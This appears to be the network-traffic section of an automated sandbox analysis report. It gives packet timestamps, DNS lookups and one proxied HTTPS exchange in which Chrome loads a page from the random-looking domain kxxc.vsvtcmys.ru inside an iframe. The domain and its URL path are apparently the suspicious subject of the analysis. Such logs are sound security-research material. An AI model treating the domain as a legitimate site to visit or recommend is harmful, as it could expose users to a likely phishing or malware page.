Mar 24, 2025 23:03:06.670763969 CET	49726	443	192.168.2.4	104.21.16.1
Mar 24, 2025 23:03:06.672910929 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.672951937 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.672982931 CET	49726	443	192.168.2.4	104.21.16.1
Mar 24, 2025 23:03:06.672990084 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.673084974 CET	49726	443	192.168.2.4	104.21.16.1
Mar 24, 2025 23:03:06.673090935 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.674251080 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.674295902 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.674325943 CET	49726	443	192.168.2.4	104.21.16.1
Mar 24, 2025 23:03:06.674334049 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.674431086 CET	49726	443	192.168.2.4	104.21.16.1
Mar 24, 2025 23:03:06.676862001 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.676893950 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.676942110 CET	49726	443	192.168.2.4	104.21.16.1
Mar 24, 2025 23:03:06.676949978 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.677042007 CET	49726	443	192.168.2.4	104.21.16.1
Mar 24, 2025 23:03:06.678919077 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.678941965 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.678994894 CET	49726	443	192.168.2.4	104.21.16.1
Mar 24, 2025 23:03:06.679002047 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.679111004 CET	49726	443	192.168.2.4	104.21.16.1
Mar 24, 2025 23:03:06.680819035 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.680834055 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.680887938 CET	49726	443	192.168.2.4	104.21.16.1
Mar 24, 2025 23:03:06.680896044 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.680988073 CET	49726	443	192.168.2.4	104.21.16.1
Mar 24, 2025 23:03:06.683322906 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.683340073 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.683398008 CET	49726	443	192.168.2.4	104.21.16.1
Mar 24, 2025 23:03:06.683407068 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.683429003 CET	49726	443	192.168.2.4	104.21.16.1
Mar 24, 2025 23:03:06.684662104 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.684683084 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.685137987 CET	49726	443	192.168.2.4	104.21.16.1
Mar 24, 2025 23:03:06.685148001 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.685286045 CET	49726	443	192.168.2.4	104.21.16.1
Mar 24, 2025 23:03:06.686362982 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.686378956 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.686484098 CET	49726	443	192.168.2.4	104.21.16.1
Mar 24, 2025 23:03:06.686490059 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.686640978 CET	49726	443	192.168.2.4	104.21.16.1
Mar 24, 2025 23:03:06.689785957 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.689801931 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.689851046 CET	49726	443	192.168.2.4	104.21.16.1
Mar 24, 2025 23:03:06.689857960 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.689956903 CET	49726	443	192.168.2.4	104.21.16.1
Mar 24, 2025 23:03:06.841109991 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.841126919 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.841177940 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.841186047 CET	49726	443	192.168.2.4	104.21.16.1
Mar 24, 2025 23:03:06.841201067 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.841243982 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.841255903 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.841283083 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.841321945 CET	49726	443	192.168.2.4	104.21.16.1
Mar 24, 2025 23:03:06.841335058 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.841360092 CET	49726	443	192.168.2.4	104.21.16.1
Mar 24, 2025 23:03:06.841375113 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.841396093 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.841423035 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.841447115 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.841670036 CET	49726	443	192.168.2.4	104.21.16.1
Mar 24, 2025 23:03:06.841878891 CET	49726	443	192.168.2.4	104.21.16.1
Mar 24, 2025 23:03:06.841891050 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.841933012 CET	49726	443	192.168.2.4	104.21.16.1
Mar 24, 2025 23:03:06.841938972 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.841963053 CET	49726	443	192.168.2.4	104.21.16.1
Mar 24, 2025 23:03:06.842359066 CET	49726	443	192.168.2.4	104.21.16.1
Mar 24, 2025 23:03:06.842801094 CET	49726	443	192.168.2.4	104.21.16.1
Mar 24, 2025 23:03:06.842978954 CET	49726	443	192.168.2.4	104.21.16.1
Mar 24, 2025 23:03:06.843424082 CET	49726	443	192.168.2.4	104.21.16.1
Mar 24, 2025 23:03:06.843444109 CET	443	49726	104.21.16.1	192.168.2.4
Mar 24, 2025 23:03:06.976210117 CET	49728	443	192.168.2.4	151.101.2.137
Mar 24, 2025 23:03:06.976334095 CET	443	49728	151.101.2.137	192.168.2.4
Mar 24, 2025 23:03:06.976457119 CET	49729	443	192.168.2.4	104.17.24.14
Mar 24, 2025 23:03:06.976510048 CET	443	49729	104.17.24.14	192.168.2.4
Mar 24, 2025 23:03:06.976555109 CET	49728	443	192.168.2.4	151.101.2.137
Mar 24, 2025 23:03:06.976922035 CET	49728	443	192.168.2.4	151.101.2.137
Mar 24, 2025 23:03:06.976955891 CET	443	49728	151.101.2.137	192.168.2.4
Mar 24, 2025 23:03:06.976973057 CET	49729	443	192.168.2.4	104.17.24.14
Mar 24, 2025 23:03:06.977106094 CET	49729	443	192.168.2.4	104.17.24.14
Mar 24, 2025 23:03:06.977116108 CET	443	49729	104.17.24.14	192.168.2.4
Mar 24, 2025 23:03:07.163645029 CET	443	49728	151.101.2.137	192.168.2.4
Mar 24, 2025 23:03:07.163717031 CET	49728	443	192.168.2.4	151.101.2.137
Mar 24, 2025 23:03:07.164652109 CET	49728	443	192.168.2.4	151.101.2.137
Mar 24, 2025 23:03:07.164695978 CET	443	49728	151.101.2.137	192.168.2.4
Mar 24, 2025 23:03:07.164908886 CET	443	49728	151.101.2.137	192.168.2.4
Mar 24, 2025 23:03:07.165481091 CET	49728	443	192.168.2.4	151.101.2.137
Mar 24, 2025 23:03:07.183187008 CET	443	49729	104.17.24.14	192.168.2.4
Mar 24, 2025 23:03:07.183259010 CET	49729	443	192.168.2.4	104.17.24.14
Mar 24, 2025 23:03:07.184098005 CET	49729	443	192.168.2.4	104.17.24.14
Mar 24, 2025 23:03:07.184108973 CET	443	49729	104.17.24.14	192.168.2.4
Mar 24, 2025 23:03:07.184452057 CET	443	49729	104.17.24.14	192.168.2.4
Mar 24, 2025 23:03:07.184681892 CET	49729	443	192.168.2.4	104.17.24.14
Mar 24, 2025 23:03:07.208364964 CET	443	49728	151.101.2.137	192.168.2.4
Mar 24, 2025 23:03:07.232322931 CET	443	49729	104.17.24.14	192.168.2.4
Mar 24, 2025 23:03:07.339984894 CET	443	49728	151.101.2.137	192.168.2.4
Mar 24, 2025 23:03:07.350775957 CET	443	49728	151.101.2.137	192.168.2.4
Mar 24, 2025 23:03:07.350791931 CET	443	49728	151.101.2.137	192.168.2.4
Mar 24, 2025 23:03:07.358028889 CET	49728	443	192.168.2.4	151.101.2.137
Mar 24, 2025 23:03:07.358079910 CET	443	49728	151.101.2.137	192.168.2.4
Mar 24, 2025 23:03:07.372318983 CET	443	49728	151.101.2.137	192.168.2.4
Mar 24, 2025 23:03:07.372718096 CET	443	49728	151.101.2.137	192.168.2.4
Mar 24, 2025 23:03:07.372736931 CET	443	49728	151.101.2.137	192.168.2.4
Mar 24, 2025 23:03:07.373195887 CET	49728	443	192.168.2.4	151.101.2.137
Mar 24, 2025 23:03:07.373195887 CET	49728	443	192.168.2.4	151.101.2.137
Mar 24, 2025 23:03:07.373225927 CET	443	49728	151.101.2.137	192.168.2.4
Mar 24, 2025 23:03:07.374150038 CET	49728	443	192.168.2.4	151.101.2.137
Mar 24, 2025 23:03:07.422827005 CET	443	49729	104.17.24.14	192.168.2.4
Mar 24, 2025 23:03:07.422885895 CET	443	49729	104.17.24.14	192.168.2.4
Mar 24, 2025 23:03:07.422924995 CET	443	49729	104.17.24.14	192.168.2.4
Mar 24, 2025 23:03:07.422957897 CET	443	49729	104.17.24.14	192.168.2.4
Mar 24, 2025 23:03:07.422991991 CET	443	49729	104.17.24.14	192.168.2.4
Mar 24, 2025 23:03:07.423021078 CET	443	49729	104.17.24.14	192.168.2.4
Mar 24, 2025 23:03:07.423055887 CET	443	49729	104.17.24.14	192.168.2.4
Mar 24, 2025 23:03:07.423074961 CET	49729	443	192.168.2.4	104.17.24.14
Mar 24, 2025 23:03:07.423090935 CET	443	49729	104.17.24.14	192.168.2.4
Mar 24, 2025 23:03:07.423150063 CET	443	49729	104.17.24.14	192.168.2.4
Mar 24, 2025 23:03:07.423268080 CET	443	49729	104.17.24.14	192.168.2.4
Mar 24, 2025 23:03:07.423356056 CET	443	49729	104.17.24.14	192.168.2.4
Mar 24, 2025 23:03:07.423393965 CET	443	49729	104.17.24.14	192.168.2.4
Mar 24, 2025 23:03:07.423424959 CET	443	49729	104.17.24.14	192.168.2.4
Mar 24, 2025 23:03:07.423453093 CET	443	49729	104.17.24.14	192.168.2.4
Mar 24, 2025 23:03:07.424278975 CET	443	49729	104.17.24.14	192.168.2.4
Mar 24, 2025 23:03:07.424325943 CET	443	49729	104.17.24.14	192.168.2.4
Mar 24, 2025 23:03:07.425461054 CET	443	49729	104.17.24.14	192.168.2.4
Mar 24, 2025 23:03:07.425537109 CET	49729	443	192.168.2.4	104.17.24.14
Mar 24, 2025 23:03:07.425546885 CET	443	49729	104.17.24.14	192.168.2.4
Mar 24, 2025 23:03:07.425589085 CET	443	49729	104.17.24.14	192.168.2.4
Mar 24, 2025 23:03:07.426198006 CET	443	49729	104.17.24.14	192.168.2.4
Mar 24, 2025 23:03:07.426276922 CET	443	49729	104.17.24.14	192.168.2.4
Mar 24, 2025 23:03:07.426311016 CET	443	49729	104.17.24.14	192.168.2.4
Mar 24, 2025 23:03:07.426346064 CET	443	49729	104.17.24.14	192.168.2.4
Mar 24, 2025 23:03:07.426887035 CET	49729	443	192.168.2.4	104.17.24.14
Mar 24, 2025 23:03:07.426898956 CET	443	49729	104.17.24.14	192.168.2.4
Mar 24, 2025 23:03:07.426955938 CET	49729	443	192.168.2.4	104.17.24.14
Mar 24, 2025 23:03:07.426964998 CET	443	49729	104.17.24.14	192.168.2.4
Mar 24, 2025 23:03:07.427305937 CET	443	49729	104.17.24.14	192.168.2.4
Mar 24, 2025 23:03:07.427345037 CET	443	49729	104.17.24.14	192.168.2.4
Mar 24, 2025 23:03:07.427377939 CET	443	49729	104.17.24.14	192.168.2.4
Mar 24, 2025 23:03:07.427411079 CET	443	49729	104.17.24.14	192.168.2.4
Mar 24, 2025 23:03:07.427843094 CET	443	49729	104.17.24.14	192.168.2.4
Mar 24, 2025 23:03:07.427942038 CET	443	49729	104.17.24.14	192.168.2.4
Mar 24, 2025 23:03:07.428666115 CET	49729	443	192.168.2.4	104.17.24.14
Mar 24, 2025 23:03:07.429075003 CET	49729	443	192.168.2.4	104.17.24.14
Mar 24, 2025 23:03:07.429091930 CET	443	49729	104.17.24.14	192.168.2.4
Mar 24, 2025 23:03:07.441543102 CET	443	49728	151.101.2.137	192.168.2.4
Mar 24, 2025 23:03:07.441566944 CET	443	49728	151.101.2.137	192.168.2.4
Mar 24, 2025 23:03:07.453510046 CET	443	49728	151.101.2.137	192.168.2.4
Mar 24, 2025 23:03:07.453555107 CET	443	49728	151.101.2.137	192.168.2.4
Mar 24, 2025 23:03:07.453665018 CET	49728	443	192.168.2.4	151.101.2.137
Mar 24, 2025 23:03:07.453701973 CET	443	49728	151.101.2.137	192.168.2.4
Mar 24, 2025 23:03:07.455104113 CET	49728	443	192.168.2.4	151.101.2.137
Mar 24, 2025 23:03:07.455173969 CET	49728	443	192.168.2.4	151.101.2.137
Mar 24, 2025 23:03:07.466275930 CET	443	49728	151.101.2.137	192.168.2.4
Mar 24, 2025 23:03:07.466290951 CET	443	49728	151.101.2.137	192.168.2.4
Mar 24, 2025 23:03:07.469346046 CET	49728	443	192.168.2.4	151.101.2.137
Mar 24, 2025 23:03:07.469369888 CET	443	49728	151.101.2.137	192.168.2.4
Mar 24, 2025 23:03:07.470925093 CET	443	49728	151.101.2.137	192.168.2.4
Mar 24, 2025 23:03:07.470999956 CET	443	49728	151.101.2.137	192.168.2.4
Mar 24, 2025 23:03:07.484054089 CET	49728	443	192.168.2.4	151.101.2.137
Mar 24, 2025 23:03:07.489928007 CET	49728	443	192.168.2.4	151.101.2.137
Mar 24, 2025 23:03:07.489974976 CET	443	49728	151.101.2.137	192.168.2.4
Mar 24, 2025 23:03:11.518529892 CET	49709	443	192.168.2.4	131.253.33.254
Mar 24, 2025 23:03:11.523935080 CET	49709	443	192.168.2.4	131.253.33.254
Mar 24, 2025 23:03:11.615516901 CET	443	49709	131.253.33.254	192.168.2.4
Mar 24, 2025 23:03:11.619642973 CET	443	49709	131.253.33.254	192.168.2.4
Mar 24, 2025 23:03:11.622131109 CET	443	49709	131.253.33.254	192.168.2.4
Mar 24, 2025 23:03:11.622165918 CET	443	49709	131.253.33.254	192.168.2.4
Mar 24, 2025 23:03:11.626220942 CET	49709	443	192.168.2.4	131.253.33.254
Mar 24, 2025 23:03:13.030080080 CET	443	49724	142.251.40.132	192.168.2.4
Mar 24, 2025 23:03:13.030159950 CET	443	49724	142.251.40.132	192.168.2.4
Mar 24, 2025 23:03:13.030390978 CET	49724	443	192.168.2.4	142.251.40.132
Mar 24, 2025 23:03:13.733932018 CET	49724	443	192.168.2.4	142.251.40.132
Mar 24, 2025 23:03:13.733957052 CET	443	49724	142.251.40.132	192.168.2.4
Mar 24, 2025 23:03:25.169415951 CET	80	49711	23.203.176.221	192.168.2.4
Mar 24, 2025 23:03:25.169511080 CET	49711	80	192.168.2.4	23.203.176.221
Mar 24, 2025 23:03:44.685646057 CET	49713	80	192.168.2.4	142.251.32.99
Mar 24, 2025 23:03:44.685759068 CET	49714	80	192.168.2.4	199.232.214.172
Mar 24, 2025 23:03:44.685769081 CET	49712	80	192.168.2.4	199.232.214.172
Mar 24, 2025 23:03:44.779503107 CET	80	49712	199.232.214.172	192.168.2.4
Mar 24, 2025 23:03:44.779515028 CET	80	49712	199.232.214.172	192.168.2.4
Mar 24, 2025 23:03:44.779561996 CET	49712	80	192.168.2.4	199.232.214.172
Mar 24, 2025 23:03:44.780085087 CET	80	49713	142.251.32.99	192.168.2.4
Mar 24, 2025 23:03:44.780096054 CET	80	49714	199.232.214.172	192.168.2.4
Mar 24, 2025 23:03:44.780106068 CET	80	49714	199.232.214.172	192.168.2.4
Mar 24, 2025 23:03:44.780150890 CET	49713	80	192.168.2.4	142.251.32.99
Mar 24, 2025 23:03:44.780169964 CET	49714	80	192.168.2.4	199.232.214.172
Mar 24, 2025 23:04:02.779784918 CET	49740	443	192.168.2.4	142.251.40.132
Mar 24, 2025 23:04:02.779897928 CET	443	49740	142.251.40.132	192.168.2.4
Mar 24, 2025 23:04:02.780003071 CET	49740	443	192.168.2.4	142.251.40.132
Mar 24, 2025 23:04:02.780174971 CET	49740	443	192.168.2.4	142.251.40.132
Mar 24, 2025 23:04:02.780201912 CET	443	49740	142.251.40.132	192.168.2.4
Mar 24, 2025 23:04:02.976433992 CET	443	49740	142.251.40.132	192.168.2.4
Mar 24, 2025 23:04:02.976686954 CET	49740	443	192.168.2.4	142.251.40.132
Mar 24, 2025 23:04:02.976752996 CET	443	49740	142.251.40.132	192.168.2.4
Mar 24, 2025 23:04:12.983959913 CET	443	49740	142.251.40.132	192.168.2.4
Mar 24, 2025 23:04:12.984044075 CET	443	49740	142.251.40.132	192.168.2.4
Mar 24, 2025 23:04:12.984132051 CET	49740	443	192.168.2.4	142.251.40.132
Mar 24, 2025 23:04:13.734479904 CET	49740	443	192.168.2.4	142.251.40.132
Mar 24, 2025 23:04:13.734548092 CET	443	49740	142.251.40.132	192.168.2.4
Mar 24, 2025 23:04:43.014127970 CET	49708	443	192.168.2.4	52.113.196.254
Mar 24, 2025 23:05:02.843797922 CET	49754	443	192.168.2.4	142.251.40.132
Mar 24, 2025 23:05:02.843846083 CET	443	49754	142.251.40.132	192.168.2.4
Mar 24, 2025 23:05:02.843924999 CET	49754	443	192.168.2.4	142.251.40.132
Mar 24, 2025 23:05:02.844153881 CET	49754	443	192.168.2.4	142.251.40.132
Mar 24, 2025 23:05:02.844170094 CET	443	49754	142.251.40.132	192.168.2.4
Mar 24, 2025 23:05:03.034761906 CET	443	49754	142.251.40.132	192.168.2.4
Mar 24, 2025 23:05:03.035095930 CET	49754	443	192.168.2.4	142.251.40.132
Mar 24, 2025 23:05:03.035196066 CET	443	49754	142.251.40.132	192.168.2.4
Mar 24, 2025 23:05:13.040738106 CET	443	49754	142.251.40.132	192.168.2.4
Mar 24, 2025 23:05:13.040891886 CET	443	49754	142.251.40.132	192.168.2.4
Mar 24, 2025 23:05:13.040991068 CET	49754	443	192.168.2.4	142.251.40.132
Mar 24, 2025 23:05:13.735291004 CET	49754	443	192.168.2.4	142.251.40.132
Mar 24, 2025 23:05:13.735333920 CET	443	49754	142.251.40.132	192.168.2.4
Mar 24, 2025 23:05:17.993422031 CET	443	49709	131.253.33.254	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 24, 2025 23:02:59.825263023 CET	53	57327	1.1.1.1	192.168.2.4
Mar 24, 2025 23:03:00.043678999 CET	53	54881	1.1.1.1	192.168.2.4
Mar 24, 2025 23:03:00.489272118 CET	53	56004	1.1.1.1	192.168.2.4
Mar 24, 2025 23:03:00.818608046 CET	53	63742	1.1.1.1	192.168.2.4
Mar 24, 2025 23:03:02.724107027 CET	49854	53	192.168.2.4	1.1.1.1
Mar 24, 2025 23:03:02.727077961 CET	55319	53	192.168.2.4	1.1.1.1
Mar 24, 2025 23:03:02.820907116 CET	53	49854	1.1.1.1	192.168.2.4
Mar 24, 2025 23:03:02.825613976 CET	53	55319	1.1.1.1	192.168.2.4
Mar 24, 2025 23:03:05.009443998 CET	55288	53	192.168.2.4	1.1.1.1
Mar 24, 2025 23:03:05.009582996 CET	62355	53	192.168.2.4	1.1.1.1
Mar 24, 2025 23:03:05.351852894 CET	53	62355	1.1.1.1	192.168.2.4
Mar 24, 2025 23:03:05.365035057 CET	53	55288	1.1.1.1	192.168.2.4
Mar 24, 2025 23:03:06.868077040 CET	62281	53	192.168.2.4	1.1.1.1
Mar 24, 2025 23:03:06.868196011 CET	64850	53	192.168.2.4	1.1.1.1
Mar 24, 2025 23:03:06.873128891 CET	50566	53	192.168.2.4	1.1.1.1
Mar 24, 2025 23:03:06.873306036 CET	61531	53	192.168.2.4	1.1.1.1
Mar 24, 2025 23:03:06.970885038 CET	53	62281	1.1.1.1	192.168.2.4
Mar 24, 2025 23:03:06.970932961 CET	53	64850	1.1.1.1	192.168.2.4
Mar 24, 2025 23:03:06.973274946 CET	53	50566	1.1.1.1	192.168.2.4
Mar 24, 2025 23:03:06.973562002 CET	53	61531	1.1.1.1	192.168.2.4
Mar 24, 2025 23:03:17.898289919 CET	53	58347	1.1.1.1	192.168.2.4
Mar 24, 2025 23:03:36.941617012 CET	53	57363	1.1.1.1	192.168.2.4
Mar 24, 2025 23:03:46.442033052 CET	138	138	192.168.2.4	192.168.2.255
Mar 24, 2025 23:03:58.648870945 CET	53	50310	1.1.1.1	192.168.2.4
Mar 24, 2025 23:04:00.913055897 CET	53	61223	1.1.1.1	192.168.2.4
Mar 24, 2025 23:04:01.130376101 CET	53	61922	1.1.1.1	192.168.2.4
Mar 24, 2025 23:04:29.800848961 CET	53	61772	1.1.1.1	192.168.2.4
Mar 24, 2025 23:05:14.524692059 CET	53	60461	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 24, 2025 23:03:02.724107027 CET	192.168.2.4	1.1.1.1	0x74e6	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Mar 24, 2025 23:03:02.727077961 CET	192.168.2.4	1.1.1.1	0x8d73	Standard query (0)	www.google.com	65	IN (0x0001)	false
Mar 24, 2025 23:03:05.009443998 CET	192.168.2.4	1.1.1.1	0x8be7	Standard query (0)	kxxc.vsvtcmys.ru	A (IP address)	IN (0x0001)	false
Mar 24, 2025 23:03:05.009582996 CET	192.168.2.4	1.1.1.1	0xa227	Standard query (0)	kxxc.vsvtcmys.ru	65	IN (0x0001)	false
Mar 24, 2025 23:03:06.868077040 CET	192.168.2.4	1.1.1.1	0x7578	Standard query (0)	code.jquery.com	A (IP address)	IN (0x0001)	false
Mar 24, 2025 23:03:06.868196011 CET	192.168.2.4	1.1.1.1	0x8f5f	Standard query (0)	code.jquery.com	65	IN (0x0001)	false
Mar 24, 2025 23:03:06.873128891 CET	192.168.2.4	1.1.1.1	0x8a91	Standard query (0)	cdnjs.cloudflare.com	A (IP address)	IN (0x0001)	false
Mar 24, 2025 23:03:06.873306036 CET	192.168.2.4	1.1.1.1	0x8c82	Standard query (0)	cdnjs.cloudflare.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Mar 24, 2025 23:03:02.820907116 CET	1.1.1.1	192.168.2.4	0x74e6	No error (0)	www.google.com	142.251.40.132	A (IP address)	IN (0x0001)	false
Mar 24, 2025 23:03:02.825613976 CET	1.1.1.1	192.168.2.4	0x8d73	No error (0)	www.google.com		65	IN (0x0001)	false
Mar 24, 2025 23:03:05.351852894 CET	1.1.1.1	192.168.2.4	0xa227	No error (0)	kxxc.vsvtcmys.ru		65	IN (0x0001)	false
Mar 24, 2025 23:03:05.365035057 CET	1.1.1.1	192.168.2.4	0x8be7	No error (0)	kxxc.vsvtcmys.ru	104.21.16.1	A (IP address)	IN (0x0001)	false
Mar 24, 2025 23:03:05.365035057 CET	1.1.1.1	192.168.2.4	0x8be7	No error (0)	kxxc.vsvtcmys.ru	104.21.80.1	A (IP address)	IN (0x0001)	false
Mar 24, 2025 23:03:05.365035057 CET	1.1.1.1	192.168.2.4	0x8be7	No error (0)	kxxc.vsvtcmys.ru	104.21.32.1	A (IP address)	IN (0x0001)	false
Mar 24, 2025 23:03:05.365035057 CET	1.1.1.1	192.168.2.4	0x8be7	No error (0)	kxxc.vsvtcmys.ru	104.21.112.1	A (IP address)	IN (0x0001)	false
Mar 24, 2025 23:03:05.365035057 CET	1.1.1.1	192.168.2.4	0x8be7	No error (0)	kxxc.vsvtcmys.ru	104.21.96.1	A (IP address)	IN (0x0001)	false
Mar 24, 2025 23:03:05.365035057 CET	1.1.1.1	192.168.2.4	0x8be7	No error (0)	kxxc.vsvtcmys.ru	104.21.64.1	A (IP address)	IN (0x0001)	false
Mar 24, 2025 23:03:05.365035057 CET	1.1.1.1	192.168.2.4	0x8be7	No error (0)	kxxc.vsvtcmys.ru	104.21.48.1	A (IP address)	IN (0x0001)	false
Mar 24, 2025 23:03:06.970885038 CET	1.1.1.1	192.168.2.4	0x7578	No error (0)	code.jquery.com	151.101.2.137	A (IP address)	IN (0x0001)	false
Mar 24, 2025 23:03:06.970885038 CET	1.1.1.1	192.168.2.4	0x7578	No error (0)	code.jquery.com	151.101.66.137	A (IP address)	IN (0x0001)	false
Mar 24, 2025 23:03:06.970885038 CET	1.1.1.1	192.168.2.4	0x7578	No error (0)	code.jquery.com	151.101.130.137	A (IP address)	IN (0x0001)	false
Mar 24, 2025 23:03:06.970885038 CET	1.1.1.1	192.168.2.4	0x7578	No error (0)	code.jquery.com	151.101.194.137	A (IP address)	IN (0x0001)	false
Mar 24, 2025 23:03:06.973274946 CET	1.1.1.1	192.168.2.4	0x8a91	No error (0)	cdnjs.cloudflare.com	104.17.24.14	A (IP address)	IN (0x0001)	false
Mar 24, 2025 23:03:06.973274946 CET	1.1.1.1	192.168.2.4	0x8a91	No error (0)	cdnjs.cloudflare.com	104.17.25.14	A (IP address)	IN (0x0001)	false
Mar 24, 2025 23:03:06.973562002 CET	1.1.1.1	192.168.2.4	0x8c82	No error (0)	cdnjs.cloudflare.com		65	IN (0x0001)	false

HTTP Request Dependency Graph

kxxc.vsvtcmys.ru

code.jquery.com

cdnjs.cloudflare.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49726	104.21.16.1	443	1236	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 22:03:05 UTC	697	OUT	GET /rnEyEPoLGAle/ HTTP/1.1 Host: kxxc.vsvtcmys.ru Connection: keep-alive sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 22:03:06 UTC	1215	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 22:03:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cache-Control: no-cache, private cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZNooJzjoGG2KdK9DKqrqRvmPqJFxFGriD0agxZUcGDMR5KI%2FJDj%2BaV4sYnEXtpmK3DSPtdtSpj5DOtDI6JlCpdBHKM45We64LFbItMJLfJI3LiGk%2Fo6%2FNUrWYn3ulIFgsLEp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} server-timing: cfL4;desc="?proto=TCP&rtt=36099&min_rtt=36079&rtt_var=13571&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2821&recv_bytes=1593&delivery_rate=78578&cwnd=87&unsent_bytes=0&cid=7fccf98572c0fb86&ts=279&x=0" Set-Cookie: XSRF-TOKEN=eyJpdiI6Imh4ZktWS3hMMDdPVW9PUEl4MHQwVmc9PSIsInZhbHVlIjoiUHArVWJsNFlTaDhrVXJnd1BOSDhOcEpZbUFjc3ZDWGlkaXMxMG9JNDdKSGhuS0cvTnc2NWxBTzc4Zm5xM1A4ako1RU91WWhFa3Jod0Q2b1dZcThJVmdjTk9Uc3FnMFRiNVFXM2ZzTmdzSCswT2dXNis0OVh2MEY4M1BiM0t4VEQiLCJtYWMiOiJiMzZiYmMwOTUxZTEwNzY4Y2M3M2U1MGVmNjc3Y2I0YWEzYWJhODk0ZmZiMTkxODQwZTY1NmY5Y2I0YzFjODEyIiwidGFnIjoiIn0%3D; expires=Tue, 25-Mar-2025 00:03:06 GMT; Max-Age=7200; path=/; secure; samesite=none
